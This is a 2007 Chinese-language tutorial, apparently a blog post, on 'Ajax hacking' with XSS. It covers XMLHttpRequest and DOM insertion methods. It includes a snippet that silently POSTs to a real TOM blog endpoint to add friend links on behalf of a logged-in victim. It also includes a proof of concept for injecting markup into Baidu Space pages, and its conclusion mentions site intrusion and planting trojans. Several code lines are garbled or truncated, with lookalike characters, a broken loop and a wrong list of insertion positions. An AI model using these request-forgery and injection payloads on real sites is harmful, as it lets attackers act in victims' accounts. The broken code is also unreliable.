ajax hacking,Ajax Hacking

(作者)

2007-08-08 19:14

1

异步数据调用

既然是Ajax hacking，自然需要用到异步的数据调用。这里将简单的介绍一下相关的知识，要更 深入的了解是长期实践的结果。

1、声明xmlhttprequest对象

数据调用需要事先声明xmlhttprequest对象，在IE6及以前版本中最简单的做法是：

var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");

在IE7和firefox中的声明方法是：

var req = new XMLHttpRequest();

所以如果我们想编出兼容性更好的代码，可以对客户端浏览器进行判断，然后分别定义 xmlhttprequest对象，如下：

if(window.XMLHttprequest){

XmlHttp = new XMLHttpRequest();

}else if (window.ActiveXObject){

Xmlhttp = new ActiveXObject ('Microsoft.XMLHTTP');

}

然后采用以下方法进行参数传递

XmlHttp.Open("POST","URL",true);

XmlHttp.send(null);

这里要主意的是，XmlHttp.Open中的第一个选项为页面的请求方式，可以为post、get、head三种 第三 个选项true表示异步方式、false表示同步方式。

利用以上代码，你可以简单实现一下在TOM博客中为当前用户添加任意用户的友情链接，如果添加 成功 会返回OK窗口，已经添加会返回friended，代码如下：

var XmlHttp=new ActiveXObject ("Microsoft.XMLhttp");

XmlHttp.Open("POST","http://blog.tom.com/manage/favorite/friend_list.php? UserName=monyer1&Flag=1",true);

XmlHttp.send(null)

XmlHttp.onreadystatechange=ServerProcess;

function ServerProcess(){

if (Xmlhttp.readystate==4 || XmlHttp.readystate=='complete')

alert (XmlHttp.responsetext); }

利用相同原理，给登录用户添加文章也不是什么难题，只不过稍微麻烦店而已，感兴趣的朋友可 以自 己回去试试。

V b s c r i p t 中声明xmlhttprequest的代码为这样:

dim httpreq as msxml.xmlhttprequest

set httpreq = new xmlhttprequest

httpreq.setrequesttheader "content- type:","text/xml;charest=gb2312"

httpreq,send

利用方式与js大体相同，这里不做过多的即时。

2、获取页面元素

获取页面指定标签和标签中的值一般会用到以下几个DOM对象，当然对象后面可以加入相关属性， 比如 style、value、innerHTML等等。

1)document. getElementByld //获得制定id的html标签相关信息

2)document. getElementByname //获得指定name的html标签相关信息

3)document. getElementByTagName //获得指定的html标签相关信息

3、在页面中插入html元素

我指导的可以在页面插入html的js函数有insertAdjacentHTML、innerHTML(outerHTML)、 inserAdjacentText、innerTEXT(outerTEXT)。其中前两个是插入html代码，后两个是插入文本，所以我们一般所用的 就是前两个。另外用document对象中的createlement也可以实现代码插入，输入js代码时 请注意大小写问题。

1) i am monyer' ">innerHTML //替换当前标签中的内容，作用域不包括当前的 html标签

2)i am monyer' ">outerHTML //替换当前标签及标签中的内容，作用域包括当前标签及其中所有内容

3)monyer')" href="#">insertAdjacentHTML //新增插入的html代码，不改 变原标签及内容

指定插入html标签语句的地方，有四种值用：

a.beforeBegin：插入到标签开始标记后

b.afterBegin：插入到标签开始标记后

c.beforeEnd：插入到标签结束标记前

d.afterEnd：插入到标签结束标记后

灵活地运用这两个函数能帮我们变换出丰富的效果来，我利用百度空间插入视频的简化POC：

Html页面的代码为：

src=http:/ /tv.mofile.com/cn/xplayer***?v=9IWKFISE

monyerflash.js代码为:

windwo.οnlοad=function(){

var i,j,x,y,z;

j=document.getElementsByTagName ('address');

for(i=0;i

y=document.getElementsByTagName('address') [i];

z=document.getElementsByTagName('address') [i]; firstChild.data;

x='';

if(y) y.insertAdjacentHTML('beforeEnd'.x);

}}

总结

有了以上概述，相信你对Ajax hacking with XSS已经有了一个大体的了解，并且只要把文中的响应内容进行简单的组合和更改，就很可能做出某些令人惊喜的东西。当然因为Ajax应用的是JavaScript的一部分，所以想充分利用Ajax式的hacking并发挥它的威力还需要你对JavaScript有一个充分的了解。当你在各个过滤系统间实战时，你会遇到更多的苦难并需要试着解决各种问题。我认为是否真正入侵一个网站或者顺利挂马是次要的，不断提高自己，在功与防的对立统一中不断寻求突破才是王道！